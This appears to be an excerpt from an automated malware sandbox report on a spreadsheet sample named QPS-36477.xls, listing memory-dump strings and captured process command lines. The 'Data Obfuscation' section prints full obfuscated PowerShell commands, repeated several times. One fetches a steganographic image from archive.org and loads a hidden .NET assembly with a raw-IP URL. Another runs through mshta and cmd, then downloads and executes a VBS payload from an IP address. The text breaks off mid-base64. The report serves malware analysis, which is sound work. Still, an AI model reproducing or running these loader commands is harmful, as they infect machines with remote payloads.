                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: 58430000.0.drInitial sample: OLE indicators vbamacros = False
                    Source: QPS-36477.xlsInitial sample: OLE indicators encrypted = True

                    Data Obfuscation

                    barindex
                    Obfuscated command line found
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
                    PowerShell case anomaly found
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WO